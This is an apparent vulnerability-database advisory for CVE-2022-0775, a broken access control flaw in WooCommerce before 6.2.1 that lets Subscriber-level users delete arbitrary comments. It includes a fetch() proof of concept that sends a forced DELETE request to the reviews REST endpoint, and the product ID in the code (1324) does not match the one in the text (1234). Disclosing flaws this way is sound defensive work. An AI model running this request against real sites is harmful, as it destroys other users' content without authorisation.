WooCommerce < 6.2.1 – Subscriber+ Arbitrary Comment Deletion | CVE 2022-0775 | Plugin Vulnerabilities

Description

The plugin does not have proper authorisation check when deleting reviews, which could allow any authenticated users, such as subscriber to delete arbitrary comment

Proof of Concept

Log in as any user (with privileges as low as Subscriber).

fetch("https://127.0.0.1:8001/?rest_route=/wc/v2/products/1324/reviews/2&force=1", {
 "headers": {
   "content-type": "application/x-www-form-urlencoded",
 },
 
 "method": "DELETE",
 "credentials": "include"
});

That needs product 1234 to not exist. It will permanently remove comment with ID 2.

Affects Plugins

Fixed in 6.2.1

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2683324

URL

https://developer.woocommerce.com/2022/02/22/woocommerce-6-2-1-security-fix/

Classification

Type

INCORRECT AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

b76dbf37-a0a2-48cf-bd85-3ebbc2f394dd

Timeline

Publicly Published

2022-02-23 (about 2 years ago)

Added

2022-02-23 (about 2 years ago)

Last Updated

2022-04-16 (about 2 years ago)

Other

Published

Title

Published

2023-05-12

Title

WPCS – WordPress Currency Switcher Professional < 1.2.0 - Subscriber+ Missing Authorization Checks

Published

2024-01-05

Title

Icegram < 3.1.22 - Contributor+ Campaign Status Toggle / Duplication

Published

2023-08-14

Title

Media from FTP < 11.17 - Author+ Arbitrary File Access

Published

2021-11-15

Title

Temporary Login Without Password < 1.7.1 - Subscriber+ Plugin's Settings Update

Published

2024-01-29

Title

Avada < 7.11.2 - Author+ Arbitrary File Upload via Zip Extraction